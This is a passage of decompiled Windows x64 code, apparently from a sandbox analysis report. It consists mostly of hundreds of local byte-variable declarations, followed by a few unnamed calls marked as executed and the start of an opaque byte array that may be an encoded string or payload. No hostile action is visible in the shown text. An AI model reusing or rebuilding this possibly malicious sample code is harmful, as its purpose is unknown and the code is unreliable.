				char _v847;
				char _v848;
				char _v849;
				char _v850;
				char _v851;
				char _v852;
				char _v853;
				char _v854;
				char _v855;
				char _v856;
				char _v857;
				char _v858;
				char _v859;
				char _v860;
				char _v861;
				char _v862;
				char _v863;
				char _v864;
				char _v865;
				char _v866;
				char _v867;
				char _v868;
				char _v869;
				char _v870;
				char _v871;
				char _v872;
				char _v873;
				char _v874;
				char _v875;
				char _v876;
				char _v877;
				char _v878;
				char _v879;
				char _v880;
				char _v881;
				char _v882;
				char _v883;
				char _v884;
				char _v885;
				char _v886;
				char _v887;
				char _v888;
				char _v889;
				char _v890;
				char _v891;
				char _v892;
				char _v893;
				char _v894;
				char _v895;
				char _v896;
				char _v897;
				char _v898;
				char _v899;
				char _v900;
				char _v901;
				char _v902;
				char _v903;
				char _v904;
				char _v905;
				char _v906;
				char _v907;
				char _v908;
				char _v909;
				char _v910;
				char _v911;
				char _v912;
				char _v913;
				char _v914;
				char _v915;
				char _v916;
				char _v917;
				char _v918;
				char _v919;
				char _v920;
				char _v921;
				char _v922;
				char _v923;
				char _v924;
				char _v925;
				char _v926;
				char _v927;
				char _v928;
				char _v929;
				char _v930;
				char _v931;
				char _v932;
				char _v933;
				char _v934;
				char _v935;
				char _v936;
				char _v937;
				char _v938;
				char _v939;
				char _v940;
				char _v941;
				char _v942;
				char _v943;
				char _v944;
				char _v945;
				char _v946;
				char _v947;
				char _v948;
				char _v949;
				char _v950;
				char _v951;
				char _v952;
				char _v953;
				char _v954;
				char _v955;
				char _v956;
				char _v957;
				char _v958;
				char _v959;
				char _v960;
				char _v961;
				char _v962;
				char _v963;
				char _v964;
				char _v965;
				char _v966;
				char _v967;
				char _v968;
				char _v969;
				char _v970;
				char _v971;
				char _v972;
				char _v973;
				char _v974;
				char _v975;
				char _v976;
				char _v977;
				char _v978;
				char _v979;
				char _v980;
				char _v981;
				char _v982;
				char _v983;
				char _v984;
				char _v985;
				char _v986;
				char _v987;
				char _v988;
				char _v989;
				char _v990;
				char _v991;
				char _v992;
				char _v993;
				char _v994;
				char _v995;
				char _v996;
				char _v997;
				char _v998;
				char _v999;
				char _v1000;
				char _v1001;
				char _v1002;
				char _v1003;
				char _v1004;
				char _v1005;
				char _v1006;
				char _v1007;
				char _v1008;
				char _v1009;
				char _v1010;
				char _v1011;
				char _v1012;
				char _v1013;
				char _v1014;
				char _v1015;
				char _v1016;
				char _v1017;
				char _v1018;
				char _v1019;
				char _v1020;
				char _v1021;
				char _v1022;
				char _v1023;
				char _v1024;
				char _v1025;
				char _v1026;
				char _v1027;
				char _v1028;
				char _v1029;
				char _v1030;
				char _v1031;
				char _v1032;
				char _v1033;
				char _v1034;
				char _v1035;
				char _v1036;
				char _v1037;
				char _v1038;
				char _v1039;
				char _v1040;
				char _v1041;
				char _v1042;
				char _v1043;
				char _v1044;
				char _v1045;
				char _v1046;
				char _v1047;
				char _v1048;
				char _v1049;
				char _v1050;
				char _v1051;
				char _v1052;
				char _v1053;
				char _v1054;
				char _v1055;
				char _v1056;
				char _v1057;
				char _v1058;
				char _v1059;
				char _v1060;
				char _v1061;
				char _v1062;
				char _v1063;
				char _v1064;
				char _v1065;
				char _v1066;
				char _v1067;
				char _v1068;
				char _v1069;
				char _v1070;
				char _v1071;
				char _v1072;
				char _v1073;
				char _v1074;
				char _v1075;
				char _v1076;
				char _v1077;
				char _v1078;
				char _v1079;
				char _v1080;
				char _v1081;
				char _v1082;
				char _v1083;
				char _v1084;
				char _v1085;
				char _v1086;
				char _v1087;
				char _v1088;
				char _v1089;
				char _v1090;
				char _v1091;
				char _v1092;
				char _v1093;
				char _v1094;
				char _v1095;
				char _v1096;
				char _v1097;
				char _v1098;
				char _v1099;
				char _v1100;
				char _v1101;
				char _v1102;
				char _v1103;
				char _v1104;
				char _v1105;
				char _v1106;
				char _v1107;
				char _v1108;
				char _v1109;
				char _v1110;
				char _v1111;
				char _v1112;
				char _v1113;
				char _v1114;
				char _v1115;
				char _v1116;
				char _v1117;
				char _v1118;
				char _v1119;
				char _v1120;
				char _v1121;
				char _v1122;
				char _v1123;
				char _v1124;
				char _v1125;
				char _v1126;
				char _v1127;
				char _v1128;
				char _v1129;
				char _v1130;
				char _v1131;
				char _v1132;
				char _v1133;
				char _v1134;
				char _v1135;
				char _v1136;
				char _v1137;
				char _v1138;
				char _v1139;
				char _v1140;
				char _v1141;
				char _v1142;
				char _v1143;
				char _v1144;
				char _v1145;
				char _v1146;
				char _v1147;
				char _v1148;
				char _v1149;
				char _v1150;
				char _v1151;
				char _v1152;
				char _v1153;
				char _v1154;
				char _v1155;
				char _v1156;
				char _v1157;
				char _v1158;
				char _v1159;
				char _v1160;
				char _v1161;
				char _v1162;
				char _v1163;
				char _v1164;
				char _v1165;
				char _v1166;
				char _v1167;
				char _v1168;
				char _v1169;
				char _v1170;
				char _v1171;
				char _v1172;
				char _v1173;
				char _v1174;
				char _v1175;
				char _v1176;
				char _v1177;
				char _v1178;
				char _v1179;
				char _v1180;
				char _v1181;
				char _v1182;
				char _v1183;
				char _v1184;
				char _v1185;
				char _v1186;
				char _v1187;
				char _v1188;
				char _v1189;
				char _v1190;
				char _v1191;
				char _v1192;
				char _v1193;
				char _v1194;
				char _v1195;
				char _v1196;
				char _v1197;
				char _v1198;
				char _v1199;
				char _v1200;
				char _v1201;
				char _v1202;
				char _v1203;
				char _v1204;
				char _v1205;
				char _v1206;
				char _v1207;
				char _v1208;
				char _v1209;
				char _v1210;
				char _v1211;
				char _v1212;
				char _v1213;
				char _v1214;
				char _v1215;
				char _v1216;
				char _v1217;
				char _v1218;
				char _v1219;
				char _v1220;
				char _v1221;
				char _v1222;
				char _v1223;
				char _v1224;
				char _v1225;
				char _v1226;
				char _v1227;
				char _v1228;
				char _v1229;
				char _v1230;
				char _v1231;
				char _v1232;
				char _v1233;
				char _v1234;
				char _v1235;
				char _v1236;
				char _v1237;
				char _v1238;
				char _v1239;
				char _v1240;
				char _v1241;
				char _v1242;
				char _v1243;
				char _v1244;
				char _v1245;
				char _v1246;
				char _v1247;
				char _v1248;
				char _v1249;
				char _v1250;
				char _v1251;
				char _v1252;
				char _v1253;
				char _v1254;
				char _v1255;
				char _v1256;
				char _v1257;
				char _v1258;
				char _v1259;
				char _v1260;
				char _v1261;
				char _v1262;
				char _v1263;
				char _v1264;
				char _v1265;
				char _v1266;
				char _v1267;
				char _v1268;
				char _v1269;
				char _v1270;
				char _v1271;
				char _v1272;
				char _v1273;
				char _v1274;
				char _v1275;
				char _v1276;
				char _v1277;
				char _v1278;
				char _v1279;
				char _v1280;
				char _v1281;
				char _v1282;
				char _v1283;
				char _v1284;
				char _v1285;
				char _v1286;
				char _v1287;
				char _v1288;
				char _v1289;
				char _v1290;
				char _v1291;
				char _v1292;
				char _v1293;
				char _v1294;
				char _v1295;
				char _v1296;
				char _v1297;
				char _v1298;
				char _v1299;
				char _v1300;
				char _v1301;
				char _v1302;
				char _v1303;
				char _v1304;
				char _v1305;
				char _v1306;
				char _v1307;
				char _v1308;
				char _v1309;
				char _v1310;
				char _v1311;
				char _v1312;
				char _v1313;
				char _v1314;
				char _v1315;
				char _v1316;
				char _v1317;
				char _v1318;
				char _v1319;
				char _v1320;
				char _v1321;
				char _v1322;
				char _v1323;
				char _v1324;
				char _v1325;
				char _v1326;
				char _v1327;
				char _v1328;
				char _v1329;
				char _v1330;
				char _v1331;
				char _v1332;
				char _v1333;
				char _v1334;
				char _v1335;
				char _v1336;
				char _v1337;
				char _v1338;
				char _v1339;
				char _v1340;
				char _v1341;
				char _v1342;
				char _v1343;
				char _v1344;
				char _v1345;
				char _v1346;
				char _v1347;
				char _v1348;
				char _v1349;
				char _v1350;
				char _v1351;
				char _v1352;
				char _v1353;
				char _v1354;
				char _v1355;
				char _v1356;
				char _v1357;
				char _v1358;
				char _v1359;
				char _v1360;
				char _v1361;
				char _v1362;
				char _v1363;
				char _v1364;
				char _v1365;
				char _v1366;
				char _v1367;
				char _v1368;
				char _v1369;
				char _v1370;
				char _v1371;
				char _v1372;
				char _v1373;
				char _v1374;
				char _v1375;
				char _v1376;
				char _v1377;
				char _v1378;
				char _v1379;
				char _v1380;
				char _v1381;
				char _v1382;
				char _v1383;
				char _v1384;
				char _v1385;
				char _v1386;
				char _v1387;
				char _v1388;
				char _v1389;
				char _v1390;
				char _v1391;
				char _v1392;
				char _v1393;
				char _v1394;
				char _v1395;
				char _v1396;
				char _v1397;
				char _v1398;
				char _v1399;
				char _v1400;
				char _v1401;
				char _v1402;
				char _v1403;
				char _v1404;
				char _v1405;
				char _v1406;
				char _v1407;
				char _v1408;
				char _v1409;
				char _v1410;
				char _v1411;
				char _v1412;
				char _v1413;
				char _v1414;
				char _v1415;
				char _v1416;
				char _v1417;
				char _v1418;
				char _v1419;
				char _v1420;
				char _v1421;
				char _v1422;
				char _v1423;
				char _v1424;
				char _v1425;
				char _v1426;
				char _v1427;
				char _v1428;
				char _v1429;
				char _v1430;
				char _v1431;
				char _v1432;
				char _v1433;
				char _v1434;
				char _v1435;
				char _v1436;
				char _v1437;
				char _v1438;
				char _v1439;
				char _v1440;
				char _v1441;
				char _v1442;
				char _v1443;
				char _v1444;
				char _v1445;
				char _v1446;
				char _v1447;
				char _v1448;
				char _v1449;
				char _v1450;
				char _v1451;
				char _v1452;
				char _v1453;
				char _v1454;
				char _v1455;
				char _v1456;
				char _v1457;
				char _v1458;
				char _v1459;
				char _v1460;
				char _v1461;
				char _v1462;
				char _v1463;
				char _v1464;
				char _v1465;
				char _v1466;
				char _v1467;
				char _v1468;
				char _v1469;
				char _v1470;
				char _v1471;
				char _v1472;
				char _v1473;
				char _v1474;
				char _v1475;
				char _v1476;
				char _v1477;
				char _v1478;
				char _v1479;
				char _v1480;
				char _v1481;
				char _v1482;
				char _v1483;
				char _v1484;
				char _v1485;
				char _v1486;
				char _v1487;
				char _v1488;
				char _v1489;
				char _v1490;
				char _v1491;
				char _v1492;
				char _v1493;
				char _v1494;
				char _v1495;
				char _v1496;
				char _v1497;
				char _v1498;
				char _v1499;
				char _v1500;
				char _v1501;
				char _v1502;
				char _v1503;
				char _v1504;
				char _v1505;
				char _v1506;
				char _v1507;
				char _v1508;
				char _v1509;
				char _v1510;
				char _v1511;
				char _v1512;
				char _v1513;
				char _v1514;
				char _v1515;
				char _v1516;
				char _v1517;
				char _v1518;
				char _v1519;
				char _v1520;
				char _v1521;
				char _v1522;
				char _v1523;
				char _v1524;
				char _v1525;
				char _v1526;
				char _v1527;
				char _v1528;
				char _v1529;
				char _v1530;
				char _v1531;
				char _v1532;
				char _v1533;
				char _v1534;
				char _v1535;
				char _v1536;
				char _v1537;
				char _v1538;
				char _v1539;
				char _v1540;
				char _v1541;
				char _v1542;
				char _v1543;
				char _v1544;
				char _v1545;
				char _v1546;
				char _v1547;
				char _v1548;
				char _v1549;
				char _v1550;
				char _v1551;
				char _v1552;
				char _v1553;
				char _v1554;
				char _v1555;
				char _v1556;
				char _v1557;
				char _v1558;
				char _v1559;
				char _v1560;
				char _v1561;
				char _v1562;
				char _v1563;
				char _v1564;
				char _v1565;
				char _v1566;
				char _v1567;
				char _v1568;
				char _v1569;
				char _v1570;
				char _v1571;
				char _v1572;
				char _v1573;
				char _v1574;
				char _v1575;
				char _v1576;
				char _v1577;
				char _v1578;
				char _v1579;
				char _v1580;
				char _v1581;
				char _v1582;
				char _v1583;
				char _v1584;
				char _v1585;
				char _v1586;
				char _v1587;
				char _v1588;
				char _v1589;
				char _v1590;
				char _v1591;
				char _v1592;
				char _v1593;
				char _v1594;
				char _v1595;
				char _v1596;
				char _v1597;
				char _v1598;
				char _v1599;
				char _v1600;
				char _v1601;
				char _v1602;
				char _v1603;
				char _v1604;
				char _v1605;
				char _v1606;
				char _v1607;
				char _v1608;
				char _v1609;
				char _v1610;
				char _v1611;
				char _v1612;
				char _v1613;
				char _v1614;
				char _v1615;
				char _v1616;
				char _v1617;
				char _v1618;
				char _v1619;
				char _v1620;
				char _v1621;
				char _v1622;
				char _v1623;
				char _v1624;
				char _v1625;
				char _v1626;
				char _v1627;
				char _v1628;
				char _v1629;
				char _v1630;
				char _v1631;
				char _v1632;
				char _v1633;
				char _v1634;
				char _v1635;
				char _v1636;
				char _v1637;
				char _v1638;
				char _v1639;
				char _v1640;
				char _v1641;
				char _v1642;
				char _v1643;
				char _v1644;
				char _v1645;
				char _v1646;
				char _v1647;
				char _v1648;
				char _v1649;
				char _v1650;
				char _v1651;
				char _v1652;
				char _v1653;
				char _v1654;
				char _v1655;
				char _v1656;
				char _v1657;
				char _v1658;
				char _v1659;
				char _v1660;
				char _v1661;
				char _v1662;
				char _v1663;
				char _v1664;
				char _v1665;
				char _v1666;
				char _v1667;
				char _v1668;
				char _v1669;
				char _v1670;
				char _v1671;
				char _v1672;
				char _v1673;
				char _v1674;
				char _v1675;
				char _v1676;
				char _v1677;
				char _v1678;
				char _v1679;
				char _v1680;
				char _v1681;
				char _v1682;
				char _v1683;
				char _v1684;
				char _v1685;
				char _v1686;
				char _v1687;
				char _v1688;
				char _v1689;
				char _v1690;
				char _v1691;
				char _v1692;
				char _v1693;
				char _v1694;
				char _v1695;
				char _v1696;
				char _v1697;
				char _v1698;
				char _v1699;
				char _v1700;
				char _v1701;
				char _v1702;
				char _v1703;
				char _v1704;
				char _v1705;
				char _v1706;
				char _v1707;
				char _v1708;
				char _v1709;
				char _v1710;
				char _v1711;
				char _v1712;
				char _v1713;
				char _v1714;
				char _v1715;
				char _v1716;
				char _v1717;
				char _v1718;
				char _v1719;
				char _v1720;
				char _v1721;
				char _v1722;
				char _v1723;
				char _v1724;
				char _v1725;
				char _v1726;
				char _v1727;
				char _v1728;
				char _v1729;
				char _v1730;
				char _v1731;
				char _v1732;
				char _v1733;
				char _v1734;
				char _v1735;
				char _v1736;
				char _v1737;
				char _v1738;
				char _v1739;
				char _v1740;
				char _v1741;
				char _v1742;
				char _v1743;
				char _v1744;
				char _v1745;
				char _v1746;
				char _v1747;
				char _v1748;
				char _v1749;
				char _v1750;
				char _v1751;
				char _v1752;
				char _v1753;
				char _v1754;
				char _v1755;
				char _v1756;
				char _v1757;
				char _v1758;
				char _v1759;
				char _v1760;
				char _v1761;
				char _v1762;
				char _v1763;
				char _v1764;
				char _v1765;
				char _v1766;
				char _v1767;
				char _v1768;
				char _v1769;
				char _v1770;
				char _v1771;
				char _v1772;
				char _v1773;
				char _v1774;
				char _v1775;
				char _v1776;
				char _v1777;
				char _v1778;
				char _v1779;
				char _v1780;
				char _v1781;
				char _v1782;
				char _v1783;
				char _v1784;
				char _v1785;
				char _v1786;
				char _v1787;
				char _v1788;
				char _v1789;
				char _v1790;
				char _v1791;
				char _v1792;
				char _v1793;
				char _v1794;
				char _v1795;
				char _v1796;
				char _v1797;
				char _v1798;
				char _v1799;
				char _v1800;
				char _v1801;
				char _v1802;
				char _v1803;
				char _v1804;
				char _v1805;
				char _v1806;
				char _v1807;
				char _v1808;
				char _v1809;
				char _v1810;
				char _v1811;
				char _v1812;
				char _v1813;
				char _v1814;
				char _v1815;
				char _v1816;
				char _v1817;
				char _v1818;
				char _v1819;
				char _v1820;
				char _v1821;
				char _v1822;
				char _v1823;
				char _v1824;
				char _v1825;
				char _v1826;
				char _v1827;
				char _v1828;
				char _v1829;
				char _v1830;
				char _v1831;
				char _v1832;
				char _v1833;
				char _v1834;
				char _v1835;
				char _v1836;
				char _v1837;
				char _v1838;
				char _v1839;
				char _v1840;
				char _v1841;
				char _v1842;
				char _v1843;
				char _v1844;
				char _v1845;
				char _v1846;
				char _v1847;
				char _v1848;
				char _v1849;
				char _v1850;
				char _v1851;
				char _v1852;
				char _v1853;
				char _v1854;
				char _v1855;
				char _v1856;
				char _v1857;
				char _v1858;
				char _v1859;
				char _v1860;
				char _v1861;
				char _v1862;
				char _v1863;
				char _v1864;
				char _v1865;
				char _v1866;
				char _v1867;
				char _v1868;
				char _v1869;
				char _v1870;
				char _v1871;
				char _v1872;
				char _v1873;
				char _v1874;
				char _v1875;
				char _v1876;
				char _v1877;
				char _v1878;
				char _v1879;
				char _v1880;
				char _v1881;
				char _v1882;
				char _v1883;
				char _v1884;
				char _v1885;
				char _v1886;
				char _v1887;
				char _v1888;
				char _v1889;
				char _v1890;
				char _v1891;
				char _v1892;
				char _v1893;
				char _v1894;
				char _v1895;
				char _v1896;
				char _v1897;
				char _v1898;
				char _v1899;
				char _v1900;
				char _v1901;
				char _v1902;
				char _v1903;
				char _v1904;
				char _v1905;
				char _v1906;
				char _v1907;
				char _v1908;
				char _v1909;
				char _v1910;
				char _v1911;
				char _v1912;
				char _v1913;
				char _v1914;
				char _v1915;
				char _v1916;
				char _v1917;
				char _v1918;
				char _v1919;
				char _v1920;
				char _v1921;
				char _v1922;
				char _v1923;
				char _v1924;
				char _v1925;
				char _v1926;
				char _v1927;
				char _v1928;
				char _v1929;
				char _v1930;
				char _v1931;
				char _v1932;
				char _v1933;
				char _v1934;
				char _v1935;
				char _v1936;
				char _v1937;
				char _v1938;
				char _v1939;
				char _v1940;
				char _v1941;
				char _v1942;
				char _v1943;
				char _v1944;
				char _v1945;
				char _v1946;
				char _v1947;
				char _v1948;
				char _v1949;
				char _v1950;
				char _v1951;
				char _v1952;
				char _v1953;
				char _v1954;
				char _v1955;
				char _v1956;
				char _v1957;
				char _v1958;
				char _v1959;
				char _v1960;
				char _v1961;
				char _v1962;
				char _v1963;
				char _v1964;
				char _v1965;
				char _v1966;
				char _v1967;
				char _v1968;
				char _v1969;
				char _v1970;
				char _v1971;
				char _v1972;
				char _v1973;
				char _v1974;
				char _v1975;
				char _v1976;
				char _v1977;
				char _v1978;
				char _v1979;
				char _v1980;
				char _v1981;
				char _v1982;
				char _v1983;
				char _v1984;
				char _v1985;
				char _v1986;
				char _v1987;
				char _v1988;
				char _v1989;
				char _v1990;
				char _v1991;
				char _v1992;
				char _v1993;
				char _v1994;
				char _v1995;
				char _v1996;
				char _v1997;
				char _v1998;
				char _v1999;
				char _v2000;
				char _v2001;
				char _v2002;
				char _v2003;
				char _v2004;
				char _v2005;
				char _v2006;
				char _v2007;
				char _v2008;
				char _v2009;
				char _v2010;
				char _v2011;
				char _v2012;
				char _v2013;
				char _v2014;
				char _v2015;
				char _v2016;
				char _v2017;
				char _v2018;
				char _v2019;
				char _v2020;
				char _v2021;
				char _v2022;
				char _v2023;
				char _v2024;
				char _v2025;
				char _v2026;
				char _v2027;
				char _v2028;
				char _v2029;
				char _v2030;
				char _v2031;
				char _v2032;
				char _v2033;
				char _v2034;
				char _v2035;
				char _v2036;
				char _v2037;
				char _v2038;
				char _v2039;
				char _v2040;
				char _v2041;
				char _v2042;
				char _v2043;
				char _v2044;
				char _v2045;
				char _v2046;
				char _v2047;
				char _v2048;
				char _v2049;
				char _v2050;
				char _v2051;
				char _v2052;
				char _v2053;
				char _v2054;
				char _v2055;
				char _v2056;
				char _v2057;
				char _v2058;
				char _v2059;
				char _v2060;
				char _v2061;
				char _v2062;
				char _v2063;
				char _v2064;
				char _v2065;
				char _v2066;
				char _v2067;
				char _v2068;
				char _v2069;
				char _v2070;
				char _v2071;
				char _v2072;
				char _v2073;
				char _v2074;
				char _v2075;
				char _v2076;
				char _v2077;
				char _v2078;
				char _v2079;
				char _v2080;
				char _v2081;
				char _v2082;
				char _v2083;
				char _v2084;
				char _v2085;
				char _v2086;
				char _v2087;
				char _v2088;
				char _v2089;
				char _v2090;
				char _v2091;
				char _v2092;
				char _v2093;
				char _v2094;
				char _v2095;
				char _v2096;
				char _v2097;
				char _v2098;
				char _v2099;
				char _v2100;
				char _v2101;
				char _v2102;
				char _v2103;
				char _v2104;
				char _v2105;
				char _v2106;
				char _v2107;
				char _v2108;
				char _v2109;
				char _v2110;
				char _v2111;
				char _v2112;
				char _v2113;
				char _v2114;
				char _v2115;
				char _v2116;
				char _v2117;
				char _v2118;
				char _v2119;
				char _v2120;
				char _v2121;
				char _v2122;
				char _v2123;
				char _v2124;
				char _v2125;
				char _v2126;
				char _v2127;
				char _v2128;
				char _v2129;
				char _v2130;
				char _v2131;
				char _v2132;
				char _v2133;
				char _v2134;
				char _v2135;
				char _v2136;
				char _v2137;
				char _v2138;
				char _v2139;
				char _v2140;
				char _v2141;
				char _v2142;
				char _v2143;
				char _v2144;
				char _v2145;
				char _v2146;
				char _v2147;
				char _v2148;
				char _v2149;
				char _v2150;
				char _v2151;
				char _v2152;
				char _v2153;
				char _v2154;
				char _v2155;
				char _v2156;
				char _v2157;
				char _v2158;
				char _v2159;
				char _v2160;
				char _v2161;
				char _v2162;
				char _v2163;
				char _v2164;
				char _v2165;
				char _v2166;
				char _v2167;
				char _v2168;
				char _v2169;
				char _v2170;
				char _v2171;
				char _v2172;
				char _v2173;
				char _v2174;
				char _v2175;
				char _v2176;
				char _v2177;
				char _v2178;
				char _v2179;
				char _v2180;
				char _v2181;
				char _v2182;
				char _v2183;
				char _v2184;
				char _v2185;
				char _v2186;
				char _v2187;
				char _v2188;
				char _v2189;
				char _v2190;
				char _v2191;
				char _v2192;
				char _v2193;
				char _v2194;
				char _v2195;
				char _v2196;
				char _v2197;
				char _v2198;
				char _v2199;
				char _v2200;
				char _v2201;
				char _v2202;
				char _v2203;
				char _v2204;
				char _v2205;
				char _v2206;
				char _v2207;
				char _v2208;
				char _v2209;
				char _v2210;
				char _v2211;
				char _v2212;
				char _v2213;
				char _v2214;
				char _v2215;
				char _v2216;
				char _v2217;
				char _v2218;
				char _v2219;
				char _v2220;
				char _v2221;
				char _v2222;
				char _v2223;
				char _v2224;
				char _v2225;
				char _v2226;
				char _v2227;
				char _v2228;
				char _v2229;
				char _v2230;
				char _v2231;
				char _v2232;
				char _v2233;
				char _v2234;
				char _v2235;
				char _v2236;
				char _v2237;
				char _v2238;
				char _v2239;
				char _v2240;
				char _v2241;
				char _v2242;
				char _v2243;
				char _v2244;
				char _v2245;
				char _v2246;
				char _v2247;
				char _v2248;
				char _v2249;
				char _v2250;
				char _v2251;
				char _v2252;
				char _v2253;
				char _v2254;
				char _v2255;
				char _v2256;
				char _v2257;
				char _v2258;
				char _v2259;
				char _v2260;
				char _v2261;
				char _v2262;
				char _v2263;
				char _v2264;
				char _v2265;
				char _v2266;
				char _v2267;
				char _v2268;
				char _v2269;
				char _v2270;
				char _v2271;
				char _v2272;
				char _v2273;
				char _v2274;
				char _v2275;
				char _v2276;
				char _v2277;
				char _v2278;
				char _v2279;
				char _v2280;
				char _v2281;
				char _v2282;
				char _v2283;
				char _v2284;
				char _v2285;
				char _v2286;
				char _v2287;
				char _v2288;
				char _v2289;
				char _v2290;
				char _v2291;
				char _v2292;
				char _v2293;
				char _v2294;
				char _v2295;
				char _v2296;
				char _v2297;
				char _v2298;
				char _v2299;
				char _v2300;
				char _v2301;
				char _v2302;
				char _v2303;
				char _v2304;
				char _v2305;
				char _v2306;
				char _v2307;
				char _v2308;
				char _v2309;
				char _v2310;
				char _v2311;
				char _v2312;
				char _v2313;
				char _v2314;
				char _v2315;
				char _v2316;
				char _v2317;
				char _v2318;
				char _v2319;
				char _v2320;
				char _v2321;
				char _v2322;
				char _v2323;
				char _v2324;
				char _v2325;
				char _v2326;
				char _v2327;
				char _v2328;
				char _v2329;
				char _v2330;
				char _v2331;
				char _v2332;
				char _v2333;
				char _v2334;
				char _v2335;
				char _v2336;
				char _v2337;
				char _v2338;
				char _v2339;
				char _v2340;
				char _v2341;
				char _v2342;
				char _v2343;
				char _v2344;
				char _v2345;
				char _v2346;
				char _v2347;
				char _v2348;
				char _v2349;
				char _v2350;
				char _v2351;
				char _v2352;
				char _v2353;
				char _v2354;
				char _v2355;
				char _v2356;
				char _v2357;
				char _v2358;
				char _v2359;
				char _v2360;
				char _v2361;
				char _v2362;
				char _v2363;
				char _v2364;
				char _v2365;
				char _v2366;
				char _v2367;
				char _v2368;
				char _v2369;
				char _v2370;
				char _v2371;
				char _v2372;
				char _v2373;
				char _v2374;
				char _v2375;
				char _v2376;
				char _v2377;
				char _v2378;
				char _v2379;
				char _v2380;
				char _v2381;
				char _v2382;
				char _v2383;
				char _v2384;
				char _v2385;
				char _v2386;
				char _v2387;
				char _v2388;
				char _v2389;
				char _v2390;
				char _v2391;
				char _v2392;
				char _v2393;
				char _v2394;
				char _v2395;
				char _v2396;
				char _v2397;
				char _v2398;
				char _v2399;
				char _v2400;
				char _v2401;
				char _v2402;
				char _v2403;
				char _v2404;
				char _v2405;
				char _v2406;
				char _v2407;
				char _v2408;
				char _v2409;
				char _v2410;
				char _v2411;
				char _v2412;
				char _v2413;
				char _v2414;
				char _v2415;
				char _v2416;
				char _v2417;
				char _v2418;
				char _v2419;
				char _v2420;
				char _v2421;
				char _v2422;
				char _v2423;
				char _v2424;
				char _v2425;
				char _v2426;
				char _v2427;
				char _v2428;
				char _v2429;
				char _v2430;
				char _v2431;
				char _v2432;
				char _v2433;
				char _v2434;
				char _v2435;
				char _v2436;
				char _v2437;
				char _v2438;
				char _v2439;
				char _v2440;
				char _v2441;
				char _v2442;
				char _v2443;
				char _v2444;
				char _v2445;
				char _v2446;
				char _v2447;
				char _v2448;
				char _v2449;
				char _v2450;
				char _v2451;
				char _v2452;
				char _v2453;
				char _v2454;
				char _v2455;
				char _v2456;
				char _v2457;
				char _v2458;
				char _v2459;
				char _v2460;
				char _v2461;
				char _v2462;
				char _v2463;
				char _v2464;
				char _v2465;
				char _v2466;
				char _v2467;
				char _v2468;
				char _v2469;
				char _v2470;
				char _v2471;
				char _v2472;
				char _v2473;
				char _v2474;
				char _v2475;
				char _v2476;
				char _v2477;
				char _v2478;
				char _v2479;
				char _v2480;
				char _v2481;
				char _v2482;
				char _v2483;
				char _v2484;
				char _v2485;
				char _v2486;
				char _v2487;
				char _v2488;
				char _v2489;
				char _v2490;
				char _v2491;
				char _v2492;
				char _v2493;
				char _v2494;
				char _v2495;
				char _v2496;
				char _v2497;
				char _v2498;
				char _v2499;
				char _v2500;
				char _v2501;
				char _v2502;
				char _v2503;
				char _v2504;
				char _v2505;
				char _v2506;
				char _v2507;
				char _v2508;
				char _v2509;
				char _v2510;
				char _v2511;
				char _v2512;
				char _v2513;
				char _v2514;
				char _v2515;
				char _v2516;
				char _v2517;
				char _v2518;
				char _v2519;
				char _v2520;
				char _v2521;
				char _v2522;
				char _v2523;
				char _v2524;
				char _v2525;
				char _v2526;
				char _v2527;
				char _v2528;
				char _v2529;
				char _v2530;
				char _v2531;
				char _v2532;
				char _v2533;
				char _v2534;
				char _v2535;
				char _v2536;
				char _v2537;
				char _v2538;
				char _v2539;
				char _v2540;
				char _v2541;
				char _v2542;
				char _v2543;
				char _v2544;
				char _v2545;
				char _v2546;
				char _v2547;
				char _v2548;
				char _v2549;
				char _v2550;
				char _v2551;
				char _v2552;
				char _v2553;
				char _v2554;
				char _v2555;
				char _v2556;
				char _v2557;
				char _v2558;
				char _v2559;
				char _v2560;
				char _v2561;
				char _v2562;
				char _v2563;
				char _v2564;
				char _v2565;
				char _v2566;
				char _v2567;
				char _v2568;
				char _v2569;
				char _v2570;
				char _v2571;
				char _v2572;
				char _v2573;
				char _v2574;
				char _v2575;
				char _v2576;
				char _v2577;
				char _v2578;
				char _v2579;
				char _v2580;
				char _v2581;
				char _v2582;
				char _v2583;
				char _v2584;
				char _v2585;
				char _v2586;
				char _v2587;
				char _v2588;
				char _v2589;
				char _v2590;
				char _v2591;
				char _v2592;
				char _v2593;
				char _v2594;
				char _v2595;
				char _v2596;
				char _v2597;
				char _v2598;
				char _v2599;
				char _v2600;
				char _v2601;
				char _v2602;
				char _v2603;
				char _v2604;
				char _v2605;
				char _v2606;
				char _v2607;
				char _v2608;
				char _v2609;
				char _v2610;
				char _v2611;
				char _v2612;
				char _v2613;
				char _v2614;
				char _v2615;
				char _v2616;
				char _v2617;
				char _v2618;
				char _v2619;
				char _v2620;
				char _v2621;
				char _v2622;
				char _v2623;
				char _v2624;
				char _v2625;
				char _v2626;
				char _v2627;
				char _v2628;
				char _v2629;
				char _v2630;
				char _v2631;
				char _v2632;
				char _v2672;
				char _v2704;
				void* _v2736;
				char _v2752;
				signed long long _v2760;
				long long _v2768;
				char _v2776;
				signed int _v2780;
				intOrPtr _v2784;
				signed long long _v2792;
				signed char _v2796;
				signed char _v2800;
				signed char _v2804;
				signed char _v2808;
				signed int _t2669;
				signed long long _t2714;
				signed long long _t2715;
				long long _t2716;
				signed long long _t2748;

				_t2746 = __rdi;
				_t2703 = __edi;
				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				_t2714 =  *0x956e008; // 0x53c008c84601
				_t2715 = _t2714 ^ _t2748;
				_v24 = _t2715;
				_v2784 = _a16;
				if (_v2784 == 1) goto 0x9503fee;
				goto 0x95093e5;
				_v2796 = 0;
				_v2800 = 0;
				_v2768 = 0;
				_v2792 = 0;
				E00007FFA7FFA094F97DC(_a16, __rcx); // executed
				_v2792 = _t2715;
				if (_v2792 == 0) goto 0x9504039;
				r8d = 0x5f5e100;
				E00007FFA7FFA094F6920(0x5f5e100, 0, __edi, __esp, _v2792, __rdx, __rdi, __r8);
				E00007FFA7FFA094F93A8(_t2715, __rbx, _v2792, __rsi); // executed
				 *0x956ea20 = 0;
				 *0x956ea14 = 0;
				 *0x956ea24 = 0;
				 *0x956ea18 = 0;
				 *0x956ea1c = 0;
				 *0x956ea10 = 0;
				_v2632 = 0x62;
				_v2631 = 0xfa;
				_v2630 = 0x28;
				_v2629 = 0x18;
				_v2628 = 0x56;
				_v2627 = 0x18;
				_v2626 = 0x3d;
				_v2625 = 0x31;
				_v2624 = 0x39;
				_v2623 = 0x13;
				_v2622 = 0x33;
				_v2621 = 9;
				_v2620 = 5;
				_v2619 = 0x64;
				_v2618 = 0x18;
